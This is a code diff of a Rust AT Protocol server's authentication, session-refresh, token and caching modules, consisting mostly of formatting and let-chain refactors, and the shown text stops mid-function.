let _ = verify(&input.password, "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK");
91
+
let _ = verify(
92
+
&input.password,
93
+
"$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK",
94
+
);
92
95
warn!("User not found for login attempt");
93
-
return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into()).into_response();
96
+
return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into())
97
+
.into_response();
94
98
}
95
99
Err(e) => {
96
100
error!("Database error fetching user: {:?}", e);
···
114
118
.fetch_all(&state.db)
115
119
.await
116
120
.unwrap_or_default();
117
-
app_passwords.iter().any(|app| verify(&input.password, &app.password_hash).unwrap_or(false))
121
+
app_passwords
122
+
.iter()
123
+
.any(|app| verify(&input.password, &app.password_hash).unwrap_or(false))
118
124
};
119
125
if !password_valid {
120
126
warn!("Password verification failed for login attempt");
121
-
return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into()).into_response();
127
+
return ApiError::AuthenticationFailedMsg("Invalid identifier or password".into())
128
+
.into_response();
122
129
}
123
-
let is_verified = row.email_confirmed
124
-
|| row.discord_verified
125
-
|| row.telegram_verified
126
-
|| row.signal_verified;
130
+
let is_verified =
131
+
row.email_confirmed || row.discord_verified || row.telegram_verified || row.signal_verified;
127
132
if !is_verified {
128
133
warn!("Login attempt for unverified account: {}", row.did);
129
134
return (
···
133
138
"message": "Please verify your account before logging in",
134
139
"did": row.did
135
140
})),
136
-
).into_response();
141
+
)
142
+
.into_response();
137
143
}
138
144
let access_meta = match crate::auth::create_access_token_with_metadata(&row.did, &key_bytes) {
139
145
Ok(m) => m,
···
169
175
refresh_jwt: refresh_meta.token,
170
176
handle: full_handle,
171
177
did: row.did,
172
-
}).into_response()
178
+
})
179
+
.into_response()
173
180
}
174
181
175
182
pub async fn get_session(
···
220
227
headers: axum::http::HeaderMap,
221
228
) -> Response {
222
229
let token = match crate::auth::extract_bearer_token_from_header(
223
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
230
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
224
231
) {
225
232
Some(t) => t,
226
233
None => return ApiError::AuthenticationRequired.into_response(),
···
254
261
headers: axum::http::HeaderMap,
255
262
) -> Response {
256
263
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
257
-
if !state.check_rate_limit(RateLimitKind::RefreshSession, &client_ip).await {
264
+
if !state
265
+
.check_rate_limit(RateLimitKind::RefreshSession, &client_ip)
266
+
.await
267
+
{
258
268
tracing::warn!(ip = %client_ip, "Refresh session rate limit exceeded");
259
269
return (
260
270
axum::http::StatusCode::TOO_MANY_REQUESTS,
···
262
272
"error": "RateLimitExceeded",
263
273
"message": "Too many requests. Please try again later."
264
274
})),
265
-
).into_response();
275
+
)
276
+
.into_response();
266
277
}
267
278
let refresh_token = match crate::auth::extract_bearer_token_from_header(
268
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
279
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
269
280
) {
270
281
Some(t) => t,
271
282
None => return ApiError::AuthenticationRequired.into_response(),
272
283
};
273
284
let refresh_jti = match crate::auth::get_jti_from_token(&refresh_token) {
274
285
Ok(jti) => jti,
275
-
Err(_) => return ApiError::AuthenticationFailedMsg("Invalid token format".into()).into_response(),
286
+
Err(_) => {
287
+
return ApiError::AuthenticationFailedMsg("Invalid token format".into())
288
+
.into_response();
289
+
}
276
290
};
277
291
let mut tx = match state.db.begin().await {
278
292
Ok(tx) => tx,
···
288
302
.fetch_optional(&mut *tx)
289
303
.await
290
304
{
291
-
warn!("Refresh token reuse detected! Revoking token family for session_id: {}", session_id);
305
+
warn!(
306
+
"Refresh token reuse detected! Revoking token family for session_id: {}",
307
+
session_id
308
+
);
292
309
let _ = sqlx::query!("DELETE FROM session_tokens WHERE id = $1", session_id)
293
310
.execute(&mut *tx)
294
311
.await;
295
312
let _ = tx.commit().await;
296
-
return ApiError::ExpiredTokenMsg("Refresh token has been revoked due to suspected compromise".into()).into_response();
313
+
return ApiError::ExpiredTokenMsg(
314
+
"Refresh token has been revoked due to suspected compromise".into(),
315
+
)
316
+
.into_response();
297
317
}
298
318
let session_row = match sqlx::query!(
299
319
r#"SELECT st.id, st.did, k.key_bytes, k.encryption_version
···
308
328
.await
309
329
{
310
330
Ok(Some(row)) => row,
311
-
Ok(None) => return ApiError::AuthenticationFailedMsg("Invalid refresh token".into()).into_response(),
312
-
Err(e) => {
313
-
error!("Database error fetching session: {:?}", e);
314
-
return ApiError::InternalError.into_response();
331
+
Ok(None) => {
332
+
return ApiError::AuthenticationFailedMsg("Invalid refresh token".into())
333
+
.into_response();
315
334
}
316
-
};
317
-
let key_bytes = match crate::config::decrypt_key(&session_row.key_bytes, session_row.encryption_version) {
318
-
Ok(k) => k,
319
335
Err(e) => {
320
-
error!("Failed to decrypt user key: {:?}", e);
336
+
error!("Database error fetching session: {:?}", e);
321
337
return ApiError::InternalError.into_response();
322
338
}
323
339
};
340
+
let key_bytes =
341
+
match crate::config::decrypt_key(&session_row.key_bytes, session_row.encryption_version) {
342
+
Ok(k) => k,
343
+
Err(e) => {
344
+
error!("Failed to decrypt user key: {:?}", e);
345
+
return ApiError::InternalError.into_response();
346
+
}
347
+
};
324
348
if crate::auth::verify_refresh_token(&refresh_token, &key_bytes).is_err() {
325
349
return ApiError::AuthenticationFailedMsg("Invalid refresh token".into()).into_response();
326
350
}
327
-
let new_access_meta = match crate::auth::create_access_token_with_metadata(&session_row.did, &key_bytes) {
328
-
Ok(m) => m,
329
-
Err(e) => {
330
-
error!("Failed to create access token: {:?}", e);
331
-
return ApiError::InternalError.into_response();
332
-
}
333
-
};
334
-
let new_refresh_meta = match crate::auth::create_refresh_token_with_metadata(&session_row.did, &key_bytes) {
335
-
Ok(m) => m,
336
-
Err(e) => {
337
-
error!("Failed to create refresh token: {:?}", e);
338
-
return ApiError::InternalError.into_response();
339
-
}
340
-
};
351
+
let new_access_meta =
352
+
match crate::auth::create_access_token_with_metadata(&session_row.did, &key_bytes) {
353
+
Ok(m) => m,
354
+
Err(e) => {
355
+
error!("Failed to create access token: {:?}", e);
356
+
return ApiError::InternalError.into_response();
357
+
}
358
+
};
359
+
let new_refresh_meta =
360
+
match crate::auth::create_refresh_token_with_metadata(&session_row.did, &key_bytes) {
361
+
Ok(m) => m,
362
+
Err(e) => {
363
+
error!("Failed to create refresh token: {:?}", e);
364
+
return ApiError::InternalError.into_response();
365
+
}
366
+
};
341
367
match sqlx::query!(
342
368
"INSERT INTO used_refresh_tokens (refresh_jti, session_id) VALUES ($1, $2) ON CONFLICT (refresh_jti) DO NOTHING",
343
369
refresh_jti,
···
482
508
warn!("Invalid verification code for user: {}", input.did);
483
509
return ApiError::InvalidRequest("Invalid verification code".into()).into_response();
484
510
}
485
-
if let Some(expires_at) = row.email_confirmation_code_expires_at {
486
-
if expires_at < Utc::now() {
511
+
if let Some(expires_at) = row.email_confirmation_code_expires_at
512
+
&& expires_at < Utc::now() {
487
513
warn!("Verification code expired for user: {}", input.did);
488
-
return ApiError::ExpiredTokenMsg("Verification code has expired".into()).into_response();
514
+
return ApiError::ExpiredTokenMsg("Verification code has expired".into())
515
+
.into_response();
489
516
}
490
-
}
491
517
let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) {
492
518
Ok(k) => k,
493
519
Err(e) => {
···
545
571
if let Err(e) = crate::notifications::enqueue_welcome(&state.db, row.id, &hostname).await {
546
572
warn!("Failed to enqueue welcome notification: {:?}", e);
547
573
}
548
-
let email_confirmed = matches!(row.channel, crate::notifications::NotificationChannel::Email);
574
+
let email_confirmed = matches!(
575
+
row.channel,
576
+
crate::notifications::NotificationChannel::Email
577
+
);
549
578
let preferred_channel = match row.channel {
550
579
crate::notifications::NotificationChannel::Email => "email",
551
580
crate::notifications::NotificationChannel::Discord => "discord",
···
561
590
email_confirmed,
562
591
preferred_channel: preferred_channel.to_string(),
563
592
preferred_channel_verified: true,
564
-
}).into_response()
593
+
})
594
+
.into_response()
565
595
}
566
596
567
597
#[derive(Deserialize)]
···
597
627
return ApiError::InternalError.into_response();
598
628
}
599
629
};
600
-
let is_verified = row.email_confirmed
601
-
|| row.discord_verified
602
-
|| row.telegram_verified
603
-
|| row.signal_verified;
630
+
let is_verified =
631
+
row.email_confirmed || row.discord_verified || row.telegram_verified || row.signal_verified;
604
632
if is_verified {
605
633
return ApiError::InvalidRequest("Account is already verified".into()).into_response();
606
634
}
···
619
647
return ApiError::InternalError.into_response();
620
648
}
621
649
let (channel_str, recipient) = match row.channel {
622
-
crate::notifications::NotificationChannel::Email => ("email", row.email.clone().unwrap_or_default()),
650
+
crate::notifications::NotificationChannel::Email => {
651
+
("email", row.email.clone().unwrap_or_default())
652
+
}
623
653
crate::notifications::NotificationChannel::Discord => {
624
654
("discord", row.discord_id.unwrap_or_default())
625
655
}
···
636
666
channel_str,
637
667
&recipient,
638
668
&verification_code,
639
-
).await {
669
+
)
670
+
.await
671
+
{
640
672
warn!("Failed to enqueue verification notification: {:?}", e);
641
673
}
642
674
Json(json!({"success": true})).into_response()
+1
-5
src/api/server/signing_key.rs
+1
-5
src/api/server/signing_key.rs
+11
-15
src/api/temp.rs
+11
-15
src/api/temp.rs
···
1
+
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
2
+
use crate::state::AppState;
1
3
use axum::{
2
4
Json,
3
5
extract::State,
···
6
8
};
7
9
use serde::Serialize;
8
10
use serde_json::json;
9
-
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
-
use crate::state::AppState;
11
11
12
12
#[derive(Serialize)]
13
13
#[serde(rename_all = "camelCase")]
···
19
19
pub estimated_time_ms: Option<i64>,
20
20
}
21
21
22
-
pub async fn check_signup_queue(
23
-
State(state): State<AppState>,
24
-
headers: HeaderMap,
25
-
) -> Response {
26
-
if let Some(token) = extract_bearer_token_from_header(
27
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
28
-
) {
29
-
if let Ok(user) = validate_bearer_token(&state.db, &token).await {
30
-
if user.is_oauth {
22
+
pub async fn check_signup_queue(State(state): State<AppState>, headers: HeaderMap) -> Response {
23
+
if let Some(token) =
24
+
extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok()))
25
+
&& let Ok(user) = validate_bearer_token(&state.db, &token).await
26
+
&& user.is_oauth {
31
27
return (
32
28
StatusCode::FORBIDDEN,
33
29
Json(json!({
34
30
"error": "Forbidden",
35
31
"message": "OAuth credentials are not supported for this endpoint"
36
32
})),
37
-
).into_response();
33
+
)
34
+
.into_response();
38
35
}
39
-
}
40
-
}
41
36
Json(CheckSignupQueueOutput {
42
37
activated: true,
43
38
place_in_queue: None,
44
39
estimated_time_ms: None,
45
-
}).into_response()
40
+
})
41
+
.into_response()
46
42
}
+14
-5
src/auth/extractor.rs
+14
-5
src/auth/extractor.rs
···
1
1
use axum::{
2
+
Json,
2
3
extract::FromRequestParts,
3
-
http::{StatusCode, request::Parts, header::AUTHORIZATION},
4
+
http::{StatusCode, header::AUTHORIZATION, request::Parts},
4
5
response::{IntoResponse, Response},
5
-
Json,
6
6
};
7
7
use serde_json::json;
8
8
9
+
use super::{
10
+
AuthenticatedUser, TokenValidationError, validate_bearer_token_cached,
11
+
validate_bearer_token_cached_allow_deactivated,
12
+
};
9
13
use crate::state::AppState;
10
-
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
11
14
12
15
pub struct BearerAuth(pub AuthenticatedUser);
13
16
···
108
111
if token.is_empty() {
109
112
return None;
110
113
}
111
-
return Some(ExtractedToken { token: token.to_string(), is_dpop: false });
114
+
return Some(ExtractedToken {
115
+
token: token.to_string(),
116
+
is_dpop: false,
117
+
});
112
118
}
113
119
114
120
if header.len() >= 5 && header[..5].eq_ignore_ascii_case("dpop ") {
···
116
122
if token.is_empty() {
117
123
return None;
118
124
}
119
-
return Some(ExtractedToken { token: token.to_string(), is_dpop: true });
125
+
return Some(ExtractedToken {
126
+
token: token.to_string(),
127
+
is_dpop: true,
128
+
});
120
129
}
121
130
122
131
None
+67
-47
src/auth/mod.rs
+67
-47
src/auth/mod.rs
···
10
10
pub mod token;
11
11
pub mod verify;
12
12
13
-
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header, extract_auth_token_from_header, ExtractedToken};
13
+
pub use extractor::{
14
+
AuthError, BearerAuth, BearerAuthAllowDeactivated, ExtractedToken,
15
+
extract_auth_token_from_header, extract_bearer_token_from_header,
16
+
};
14
17
pub use token::{
15
-
create_access_token, create_refresh_token, create_service_token,
16
-
create_access_token_with_metadata, create_refresh_token_with_metadata,
17
-
TokenWithMetadata,
18
-
TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE,
19
-
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
18
+
SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS,
19
+
TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token,
20
+
create_access_token_with_metadata, create_refresh_token, create_refresh_token_with_metadata,
21
+
create_service_token,
22
+
};
23
+
pub use verify::{
24
+
get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token,
20
25
};
21
-
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
22
26
23
27
const KEY_CACHE_TTL_SECS: u64 = 300;
24
28
const SESSION_CACHE_TTL_SECS: u64 = 60;
···
113
117
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
114
118
None => (None, None, None),
115
119
}
116
-
} else {
117
-
if let Some(user) = sqlx::query!(
118
-
"SELECT k.key_bytes, k.encryption_version, u.deactivated_at, u.takedown_ref
119
-
FROM users u
120
-
JOIN user_keys k ON u.id = k.user_id
121
-
WHERE u.did = $1",
122
-
did
123
-
)
124
-
.fetch_optional(db)
125
-
.await
126
-
.ok()
127
-
.flatten()
128
-
{
129
-
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
130
-
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
120
+
} else if let Some(user) = sqlx::query!(
121
+
"SELECT k.key_bytes, k.encryption_version, u.deactivated_at, u.takedown_ref
122
+
FROM users u
123
+
JOIN user_keys k ON u.id = k.user_id
124
+
WHERE u.did = $1",
125
+
did
126
+
)
127
+
.fetch_optional(db)
128
+
.await
129
+
.ok()
130
+
.flatten()
131
+
{
132
+
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
133
+
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
131
134
132
-
if let Some(c) = cache {
133
-
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
134
-
}
135
-
136
-
(Some(key), user.deactivated_at, user.takedown_ref)
137
-
} else {
138
-
(None, None, None)
135
+
if let Some(c) = cache {
136
+
let _ = c
137
+
.set_bytes(
138
+
&key_cache_key,
139
+
&key,
140
+
Duration::from_secs(KEY_CACHE_TTL_SECS),
141
+
)
142
+
.await;
139
143
}
144
+
145
+
(Some(key), user.deactivated_at, user.takedown_ref)
146
+
} else {
147
+
(None, None, None)
140
148
};
141
149
142
150
if let Some(decrypted_key) = decrypted_key {
···
175
183
176
184
session_valid = session_exists.is_some();
177
185
178
-
if session_valid {
179
-
if let Some(c) = cache {
180
-
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
186
+
if session_valid
187
+
&& let Some(c) = cache {
188
+
let _ = c
189
+
.set(
190
+
&session_cache_key,
191
+
"1",
192
+
Duration::from_secs(SESSION_CACHE_TTL_SECS),
193
+
)
194
+
.await;
181
195
}
182
-
}
183
196
}
184
197
185
198
if session_valid {
···
193
206
}
194
207
}
195
208
196
-
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
197
-
if let Some(oauth_token) = sqlx::query!(
209
+
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token)
210
+
&& let Some(oauth_token) = sqlx::query!(
198
211
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref,
199
212
k.key_bytes as "key_bytes?", k.encryption_version as "encryption_version?"
200
213
FROM oauth_token t
···
218
231
219
232
let now = chrono::Utc::now();
220
233
if oauth_token.expires_at > now {
221
-
let key_bytes = if let (Some(kb), Some(ev)) = (&oauth_token.key_bytes, oauth_token.encryption_version) {
234
+
let key_bytes = if let (Some(kb), Some(ev)) =
235
+
(&oauth_token.key_bytes, oauth_token.encryption_version)
236
+
{
222
237
crate::config::decrypt_key(kb, Some(ev)).ok()
223
238
} else {
224
239
None
···
230
245
});
231
246
}
232
247
}
233
-
}
234
248
235
249
Err(TokenValidationError::AuthenticationFailed)
236
250
}
···
256
270
return validate_bearer_token(db, token).await;
257
271
}
258
272
}
259
-
match crate::oauth::verify::verify_oauth_access_token(db, token, dpop_proof, http_method, http_uri).await {
273
+
match crate::oauth::verify::verify_oauth_access_token(
274
+
db,
275
+
token,
276
+
dpop_proof,
277
+
http_method,
278
+
http_uri,
279
+
)
280
+
.await
281
+
{
260
282
Ok(result) => {
261
283
if !allow_deactivated {
262
284
let deactivated = sqlx::query_scalar!(
···
272
294
return Err(TokenValidationError::AccountDeactivated);
273
295
}
274
296
}
275
-
let takedown = sqlx::query_scalar!(
276
-
"SELECT takedown_ref FROM users WHERE did = $1",
277
-
result.did
278
-
)
279
-
.fetch_optional(db)
280
-
.await
281
-
.ok()
282
-
.flatten()
283
-
.flatten();
297
+
let takedown =
298
+
sqlx::query_scalar!("SELECT takedown_ref FROM users WHERE did = $1", result.did)
299
+
.fetch_optional(db)
300
+
.await
301
+
.ok()
302
+
.flatten()
303
+
.flatten();
284
304
if takedown.is_some() {
285
305
return Err(TokenValidationError::AccountTakedown);
286
306
}
+46
-8
src/auth/token.rs
+46
-8
src/auth/token.rs
···
33
33
}
34
34
35
35
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
36
-
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
36
+
create_signed_token_with_metadata(
37
+
did,
38
+
SCOPE_ACCESS,
39
+
TOKEN_TYPE_ACCESS,
40
+
key_bytes,
41
+
Duration::minutes(120),
42
+
)
37
43
}
38
44
39
-
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
40
-
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
45
+
pub fn create_refresh_token_with_metadata(
46
+
did: &str,
47
+
key_bytes: &[u8],
48
+
) -> Result<TokenWithMetadata> {
49
+
create_signed_token_with_metadata(
50
+
did,
51
+
SCOPE_REFRESH,
52
+
TOKEN_TYPE_REFRESH,
53
+
key_bytes,
54
+
Duration::days(90),
55
+
)
41
56
}
42
57
43
58
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
···
132
147
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
133
148
}
134
149
135
-
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
136
-
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
150
+
pub fn create_access_token_hs256_with_metadata(
151
+
did: &str,
152
+
secret: &[u8],
153
+
) -> Result<TokenWithMetadata> {
154
+
create_hs256_token_with_metadata(
155
+
did,
156
+
SCOPE_ACCESS,
157
+
TOKEN_TYPE_ACCESS,
158
+
secret,
159
+
Duration::minutes(120),
160
+
)
137
161
}
138
162
139
-
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
140
-
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
163
+
pub fn create_refresh_token_hs256_with_metadata(
164
+
did: &str,
165
+
secret: &[u8],
166
+
) -> Result<TokenWithMetadata> {
167
+
create_hs256_token_with_metadata(
168
+
did,
169
+
SCOPE_REFRESH,
170
+
TOKEN_TYPE_REFRESH,
171
+
secret,
172
+
Duration::days(90),
173
+
)
141
174
}
142
175
143
-
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
176
+
pub fn create_service_token_hs256(
177
+
did: &str,
178
+
aud: &str,
179
+
lxm: &str,
180
+
secret: &[u8],
181
+
) -> Result<String> {
144
182
let expiration = Utc::now()
145
183
.checked_add_signed(Duration::seconds(60))
146
184
.expect("valid timestamp")
+22
-12
src/auth/verify.rs
+22
-12
src/auth/verify.rs
···
1
+
use super::token::{
2
+
SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS,
3
+
TOKEN_TYPE_REFRESH,
4
+
};
1
5
use super::{Claims, Header, TokenData, UnsafeClaims};
2
-
use super::token::{TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED};
3
6
use anyhow::{Context, Result, anyhow};
4
7
use base64::Engine as _;
5
8
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
···
40
43
let claims: serde_json::Value =
41
44
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
42
45
43
-
claims.get("jti")
46
+
claims
47
+
.get("jti")
44
48
.and_then(|j| j.as_str())
45
49
.map(|s| s.to_string())
46
50
.ok_or_else(|| "No jti claim in token".to_string())
···
108
112
let header: Header =
109
113
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
110
114
111
-
if let Some(expected) = expected_typ {
112
-
if header.typ != expected {
113
-
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
115
+
if let Some(expected) = expected_typ
116
+
&& header.typ != expected {
117
+
return Err(anyhow!(
118
+
"Invalid token type: expected {}, got {}",
119
+
expected,
120
+
header.typ
121
+
));
114
122
}
115
-
}
116
123
117
124
let signature_bytes = URL_SAFE_NO_PAD
118
125
.decode(signature_b64)
···
177
184
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
178
185
}
179
186
180
-
if let Some(expected) = expected_typ {
181
-
if header.typ != expected {
182
-
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
187
+
if let Some(expected) = expected_typ
188
+
&& header.typ != expected {
189
+
return Err(anyhow!(
190
+
"Invalid token type: expected {}, got {}",
191
+
expected,
192
+
header.typ
193
+
));
183
194
}
184
-
}
185
195
186
196
let signature_bytes = URL_SAFE_NO_PAD
187
197
.decode(signature_b64)
···
189
199
190
200
let message = format!("{}.{}", header_b64, claims_b64);
191
201
192
-
let mut mac = HmacSha256::new_from_slice(secret)
193
-
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
202
+
let mut mac =
203
+
HmacSha256::new_from_slice(secret).map_err(|e| anyhow!("Invalid secret: {}", e))?;
194
204
mac.update(message.as_bytes());
195
205
196
206
let expected_signature = mac.finalize().into_bytes();
+2
-43
src/cache/mod.rs
+2
-43
src/cache/mod.rs
···
32
32
33
33
impl ValkeyCache {
34
34
pub async fn new(url: &str) -> Result<Self, CacheError> {
35
-
let client = redis::Client::open(url)
36
-
.map_err(|e| CacheError::Connection(e.to_string()))?;
35
+
let client = redis::Client::open(url).map_err(|e| CacheError::Connection(e.to_string()))?;
37
36
let manager = client
38
37
.get_connection_manager()
39
38
.await
···
118
117
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
119
118
let mut conn = self.conn.clone();
120
119
let full_key = format!("rl:{}", key);
121
-
let window_secs = ((window_ms + 999) / 1000).max(1) as i64;
120
+
let window_secs = window_ms.div_ceil(1000).max(1) as i64;
122
121
let count: Result<i64, _> = redis::cmd("INCR")
123
122
.arg(&full_key)
124
123
.query_async(&mut conn)
···
147
146
impl DistributedRateLimiter for NoOpRateLimiter {
148
147
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
149
148
true
150
-
}
151
-
}
152
-
153
-
pub enum CacheBackend {
154
-
Valkey(ValkeyCache),
155
-
NoOp,
156
-
}
157
-
158
-
impl CacheBackend {
159
-
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
160
-
match self {
161
-
CacheBackend::Valkey(cache) => {
162
-
Arc::new(RedisRateLimiter::new(cache.connection()))
163
-
}
164
-
CacheBackend::NoOp => Arc::new(NoOpRateLimiter),
165
-
}
166
-
}
167
-
}
168
-
169
-
#[async_trait]
170
-
impl Cache for CacheBackend {
171
-
async fn get(&self, key: &str) -> Option<String> {
172
-
match self {
173
-
CacheBackend::Valkey(c) => c.get(key).await,
174
-
CacheBackend::NoOp => None,
175
-
}
176
-
}
177
-
178
-
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
179
-
match self {
180
-
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
181
-
CacheBackend::NoOp => Ok(()),
182
-
}
183
-
}
184
-
185
-
async fn delete(&self, key: &str) -> Result<(), CacheError> {
186
-
match self {
187
-
CacheBackend::Valkey(c) => c.delete(key).await,
188
-
CacheBackend::NoOp => Ok(()),
189
-
}
190
149
}
191
150
}
192
151
+7
-2
src/circuit_breaker.rs
+7
-2
src/circuit_breaker.rs
···
1
-
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
2
1
use std::sync::Arc;
2
+
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
3
3
use std::time::Duration;
4
4
use tokio::sync::RwLock;
5
5
···
22
22
}
23
23
24
24
impl CircuitBreaker {
25
-
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
25
+
pub fn new(
26
+
name: &str,
27
+
failure_threshold: u32,
28
+
success_threshold: u32,
29
+
timeout_secs: u64,
30
+
) -> Self {
26
31
Self {
27
32
name: name.to_string(),
28
33
failure_threshold,
+16
-9
src/config.rs
+16
-9
src/config.rs
···
1
1
#[allow(deprecated)]
2
-
use aes_gcm::{
3
-
Aes256Gcm, KeyInit, Nonce,
4
-
aead::Aead,
5
-
};
2
+
use aes_gcm::{Aes256Gcm, KeyInit, Nonce, aead::Aead};
6
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
7
4
use hkdf::Hkdf;
8
5
use p256::ecdsa::SigningKey;
···
62
59
hasher.update(jwt_secret.as_bytes());
63
60
let seed = hasher.finalize();
64
61
65
-
let signing_key = SigningKey::from_slice(&seed)
66
-
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
62
+
let signing_key = SigningKey::from_slice(&seed).unwrap_or_else(|e| {
63
+
panic!(
64
+
"Failed to create signing key from seed: {}. This is a bug.",
65
+
e
66
+
)
67
+
});
67
68
68
69
let verifying_key = signing_key.verifying_key();
69
70
let point = verifying_key.to_encoded_point(false);
70
71
71
72
let signing_key_x = URL_SAFE_NO_PAD.encode(
72
-
point.x().expect("EC point missing X coordinate - this should never happen")
73
+
point
74
+
.x()
75
+
.expect("EC point missing X coordinate - this should never happen"),
73
76
);
74
77
let signing_key_y = URL_SAFE_NO_PAD.encode(
75
-
point.y().expect("EC point missing Y coordinate - this should never happen")
78
+
point
79
+
.y()
80
+
.expect("EC point missing Y coordinate - this should never happen"),
76
81
);
77
82
78
83
let mut kid_hasher = Sha256::new();
···
114
119
}
115
120
116
121
pub fn get() -> &'static Self {
117
-
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
122
+
CONFIG
123
+
.get()
124
+
.expect("AuthConfig not initialized - call AuthConfig::init() first")
118
125
}
119
126
120
127
pub fn jwt_secret(&self) -> &str {
+7
-5
src/crawlers.rs
+7
-5
src/crawlers.rs
···
1
1
use crate::circuit_breaker::CircuitBreaker;
2
2
use crate::sync::firehose::SequencedEvent;
3
3
use reqwest::Client;
4
-
use std::sync::atomic::{AtomicU64, Ordering};
5
4
use std::sync::Arc;
5
+
use std::sync::atomic::{AtomicU64, Ordering};
6
6
use std::time::Duration;
7
7
use tokio::sync::{broadcast, watch};
8
8
use tracing::{debug, error, info, warn};
···
78
78
return;
79
79
}
80
80
81
-
if let Some(cb) = &self.circuit_breaker {
82
-
if !cb.can_execute().await {
81
+
if let Some(cb) = &self.circuit_breaker
82
+
&& !cb.can_execute().await {
83
83
debug!("Skipping crawler notification due to circuit breaker open");
84
84
return;
85
85
}
86
-
}
87
86
88
87
self.mark_notified();
89
88
let circuit_breaker = self.circuit_breaker.clone();
90
89
91
90
for crawler_url in &self.crawler_urls {
92
-
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
91
+
let url = format!(
92
+
"{}/xrpc/com.atproto.sync.requestCrawl",
93
+
crawler_url.trim_end_matches('/')
94
+
);
93
95
let hostname = self.hostname.clone();
94
96
let client = self.http_client.clone();
95
97
let cb = circuit_breaker.clone();
+20
-7
src/image/mod.rs
+20
-7
src/image/mod.rs
···
90
90
self
91
91
}
92
92
93
-
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
93
+
pub fn process(
94
+
&self,
95
+
data: &[u8],
96
+
mime_type: &str,
97
+
